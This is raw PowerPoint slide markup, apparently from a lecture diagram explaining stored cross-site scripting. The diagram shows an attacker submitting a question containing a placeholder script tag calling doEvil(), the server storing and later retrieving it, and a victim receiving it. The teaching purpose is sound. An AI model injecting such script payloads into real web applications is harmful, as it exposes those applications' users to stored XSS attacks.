                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“&lt;script&gt;doEvil()&lt;/script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538387"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>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621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="object 27"/>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8" name="object 28"/>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29" name="object 29"/>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0" name="object 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>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3" name="object 33"/>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4" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 36"/>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37" name="object 37"/>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8" name="object 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 40"/>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1" name="object 41"/>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2" name="object 42"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273726" y="3603749"/>
            <a:ext cx="1134533"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4" name="object 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 45"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="object 46"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 47"/>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48" name="object 48"/>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9" name="object 49"/>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50" name="object 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="3050012"/>
            <a:ext cx="291253" cy="209973"/>
            <a:chOff x="275823" y="2287509"/>
            <a:chExt cx="218440" cy="157480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 51"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 52"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63555" y="3662876"/>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54" name="object 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740987" y="5752199"/>
            <a:ext cx="1949027" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="539313"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>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56" name="object 56"/>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78784" y="1196564"/>
            <a:ext cx="3307080" cy="3420533"/>
            <a:chOff x="6209088" y="897423"/>
            <a:chExt cx="2480310" cy="2565400"/>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952808" y="897423"/>
              <a:ext cx="736061" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>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93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2298960" y="3503062"/>
            <a:ext cx="5149427" cy="1983740"/>
            <a:chOff x="1724220" y="2627296"/>
            <a:chExt cx="3862070" cy="1487805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>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9" name="object 9"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762756" y="3096107"/>
              <a:ext cx="3707129" cy="1000125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3707129" h="1000125">
                  <a:moveTo>
                    <a:pt x="3706710" y="999642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762757" y="3061491"/>
              <a:ext cx="128270" cy="128905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="128269" h="128905">
                  <a:moveTo>
                    <a:pt x="92989" y="128752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="34607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127711" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 1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3" name="object 1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4" name="object 1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5" name="object 1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6" name="object 1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7" name="object 1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8" name="object 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792013" y="3988905"/>
            <a:ext cx="3340100" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249213" y="4354665"/>
            <a:ext cx="2970953" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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21" name="object 21"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“&lt;script&gt;doEvil()&lt;/script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538387"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342211" y="3364091"/>
            <a:ext cx="2352885" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="just">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
